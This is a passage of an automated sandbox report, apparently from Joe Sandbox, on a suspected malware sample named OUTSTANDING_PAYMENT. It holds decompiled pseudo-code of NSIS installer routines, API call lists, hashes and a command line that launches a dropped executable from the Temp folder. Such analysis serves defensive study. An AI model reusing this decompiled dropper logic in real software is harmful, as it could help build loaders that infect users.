                                                                                                                        0x00000000
                                                                                                                        0x00402398
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                                                        • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,00000000,00000000,"C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                                                                          • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                                                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                        • String ID: "C:\Users\user\AppData\Local\Temp\qhcqh.exe" C:\Users\user\AppData\Local\Temp\bpgvtpbkoxw.z$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                                                                                        • API String ID: 1941528284-3743450223
                                                                                                                        • Opcode ID: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                                                        • Instruction ID: 87dd38174d63fc88252c3cacf76d35d2aef1a13c6195c1d88e2760da23471212
                                                                                                                        • Opcode Fuzzy Hash: 453958bc0cd1b2dd253e880fcd992b37c005c95db4a67daf6dea3c0e9c97f409
                                                                                                                        • Instruction Fuzzy Hash: DE41B771500205BACF10BBB5CD85DAE7A75EF45328B20473FF422B21E1D63D89619A2E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 525 4069c5-4069e5 GetSystemDirectoryW 526 4069e7 525->526 527 4069e9-4069eb 525->527 526->527 528 4069fc-4069fe 527->528 529 4069ed-4069f6 527->529 531 4069ff-406a32 wsprintfW LoadLibraryExW 528->531 529->528 530 4069f8-4069fa 529->530 530->531
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E004069C5(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                                                                        0x004069dc
                                                                                                                        0x004069e5
                                                                                                                        0x004069e7
                                                                                                                        0x004069e7
                                                                                                                        0x004069eb
                                                                                                                        0x004069fe
                                                                                                                        0x004069f8
                                                                                                                        0x004069f8
                                                                                                                        0x004069f8
                                                                                                                        0x00406a17
                                                                                                                        0x00406a2b
                                                                                                                        0x00406a32

                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                                                                                                                        • wsprintfW.USER32 ref: 00406A17
                                                                                                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%S.dll$UXTHEME$\
                                                                                                                        • API String ID: 2200240437-1946221925
                                                                                                                        • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                        • Instruction ID: e2ac2e7087162e0187f8b4d6776822ec24d6e31928394cf94a41c199a4feb156
                                                                                                                        • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                                                                                                                        • Instruction Fuzzy Hash: 3AF096B154121DA7DB14AB68DD0EF9B366CAB00705F11447EA646F20E0EB7CDA68CB98
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 532 405b99-405be4 CreateDirectoryW 533 405be6-405be8 532->533 534 405bea-405bf7 GetLastError 532->534 535 405c11-405c13 533->535 534->535 536 405bf9-405c0d SetFileSecurityW 534->536 536->533 537 405c0f GetLastError 536->537 537->535
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00405B99(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}







                                                                                                                        0x00405ba4
                                                                                                                        0x00405ba8
                                                                                                                        0x00405bab
                                                                                                                        0x00405bb1
                                                                                                                        0x00405bb5
                                                                                                                        0x00405bb9
                                                                                                                        0x00405bc1
                                                                                                                        0x00405bc8
                                                                                                                        0x00405bce
                                                                                                                        0x00405bd5
                                                                                                                        0x00405bdc
                                                                                                                        0x00405be4
                                                                                                                        0x00405be6
                                                                                                                        0x00000000
                                                                                                                        0x00405be6
                                                                                                                        0x00405bf0
                                                                                                                        0x00405bf7
                                                                                                                        0x00405c0d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405c0f
                                                                                                                        0x00405c13

                                                                                                                        APIs
                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BDC
                                                                                                                        • GetLastError.KERNEL32 ref: 00405BF0
                                                                                                                        • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C05
                                                                                                                        • GetLastError.KERNEL32 ref: 00405C0F
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BBF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                        • API String ID: 3449924974-3916508600
                                                                                                                        • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                        • Instruction ID: 886f74eda6482ab63e8fe18d08a652fea41827dc0a526659a7d7b5e138c44e4e
                                                                                                                        • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                                                                                                                        • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403479 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 538 403479-4034a1 GetTickCount 539 4035d1-4035d9 call 40302e 538->539 540 4034a7-4034d2 call 4035f8 SetFilePointer 538->540 545 4035db-4035df 539->545 546 4034d7-4034e9 540->546 547 4034eb 546->547 548 4034ed-4034fb call 4035e2 546->548 547->548 551 403501-40350d 548->551 552 4035c3-4035c6 548->552 553 403513-403519 551->553 552->545 554 403544-403560 call 406bb0 553->554 555 40351b-403521 553->555 561 403562-40356a 554->561 562 4035cc 554->562 555->554 556 403523-403543 call 40302e 555->556 556->554 564 40356c-403574 call 40620a 561->564 565 40358d-403593 561->565 563 4035ce-4035cf 562->563 563->545 569 403579-40357b 564->569 565->562 566 403595-403597 565->566 566->562 568 403599-4035ac 566->568 568->546 570 4035b2-4035c1 SetFilePointer 568->570 571 4035c8-4035ca 569->571 572 40357d-403589 569->572 570->539 571->563 572->553 573 40358b 572->573 573->568
                                                                                                                        C-Code - Quality: 93%
                                                                                                                        			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x40e23e
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}














                                                                                                                        0x00403489
                                                                                                                        0x0040349c
                                                                                                                        0x004034a1
                                                                                                                        0x004035d1
                                                                                                                        0x004035d3
                                                                                                                        0x00000000
                                                                                                                        0x004035d9
                                                                                                                        0x004034ad
                                                                                                                        0x004034c0
                                                                                                                        0x004034c6
                                                                                                                        0x004034cc
                                                                                                                        0x004034d7
                                                                                                                        0x004034dc
                                                                                                                        0x004034e1
                                                                                                                        0x004034e9
                                                                                                                        0x004034eb
                                                                                                                        0x004034eb
                                                                                                                        0x004034f4
                                                                                                                        0x004034fb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403501
                                                                                                                        0x00403507
                                                                                                                        0x0040350d
                                                                                                                        0x00000000
                                                                                                                        0x00403513
                                                                                                                        0x00403519
                                                                                                                        0x00403539
                                                                                                                        0x0040353e
                                                                                                                        0x00403543
                                                                                                                        0x00403549
                                                                                                                        0x0040354f
                                                                                                                        0x00403559
                                                                                                                        0x00403560
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403562
                                                                                                                        0x00403568
                                                                                                                        0x0040356a
                                                                                                                        0x0040358d
                                                                                                                        0x00403593
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403595
                                                                                                                        0x00403597
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00403599
                                                                                                                        0x00403599
                                                                                                                        0x004035ac
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004035bb
                                                                                                                        0x00000000
                                                                                                                        0x004035bb
                                                                                                                        0x00403574
                                                                                                                        0x0040357b
                                                                                                                        0x004035c8
                                                                                                                        0x004035ce
                                                                                                                        0x004035ce
                                                                                                                        0x00000000
                                                                                                                        0x004035ce
                                                                                                                        0x0040357d
                                                                                                                        0x00403583
                                                                                                                        0x00403589
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004035cc
                                                                                                                        0x004035cc
                                                                                                                        0x00000000
                                                                                                                        0x004035cc
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040348D
                                                                                                                          • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FilePointer$CountTick
                                                                                                                        • String ID: >@
                                                                                                                        • API String ID: 1092082344-3214575836
                                                                                                                        • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                        • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                                                        • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                        • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00406187 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 574 406187-406193 575 406194-4061c8 GetTickCount GetTempFileNameW 574->575 576 4061d7-4061d9 575->576 577 4061ca-4061cc 575->577 579 4061d1-4061d4 576->579 577->575 578 4061ce 577->578 578->579
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00406187(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a5ac; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}












                                                                                                                        0x0040618d
                                                                                                                        0x00406193
                                                                                                                        0x00406194
                                                                                                                        0x00406194
                                                                                                                        0x00406199
                                                                                                                        0x0040619a
                                                                                                                        0x0040619d
                                                                                                                        0x004061a2
                                                                                                                        0x004061a5
                                                                                                                        0x004061af
                                                                                                                        0x004061bc
                                                                                                                        0x004061c0
                                                                                                                        0x004061c8
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061cc
                                                                                                                        0x00000000
                                                                                                                        0x004061ce
                                                                                                                        0x004061ce
                                                                                                                        0x004061ce
                                                                                                                        0x004061d1
                                                                                                                        0x004061d4
                                                                                                                        0x004061d4
                                                                                                                        0x004061d7
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 004061A5
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040363E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 004061C0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-1968954121
                                                                                                                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                        • Instruction ID: 21b676f9b33da427d45e0b2d6905a63b6509bf3d89a4e990effff8b21c6fdcbe
                                                                                                                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                                                                                                                        • Instruction Fuzzy Hash: C3F09076700214BFEB008F59DD05E9AB7BCEBA1710F11803AEE05EB180E6B0A9648768
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 580 403c25-403c34 581 403c40-403c48 580->581 582 403c36-403c39 CloseHandle 580->582 583 403c54-403c60 call 403c82 call 405d74 581->583 584 403c4a-403c4d CloseHandle 581->584 582->581 588 403c65-403c66 583->588 584->583
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E00403C25() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				_t4 = E00405D74(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nshF17F.tmp\\", 7); // executed
				return _t4;
			}







                                                                                                                        0x00403c25
                                                                                                                        0x00403c34
                                                                                                                        0x00403c37
                                                                                                                        0x00403c39
                                                                                                                        0x00403c39
                                                                                                                        0x00403c40
                                                                                                                        0x00403c48
                                                                                                                        0x00403c4b
                                                                                                                        0x00403c4d
                                                                                                                        0x00403c4d
                                                                                                                        0x00403c4d
                                                                                                                        0x00403c54
                                                                                                                        0x00403c60
                                                                                                                        0x00403c66

                                                                                                                        APIs
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\AppData\Local\Temp\nshF17F.tmp\, xrefs: 00403C5B
                                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nshF17F.tmp\
                                                                                                                        • API String ID: 2962429428-3144369173
                                                                                                                        • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                        • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                                                                                        • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                                                                                        • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
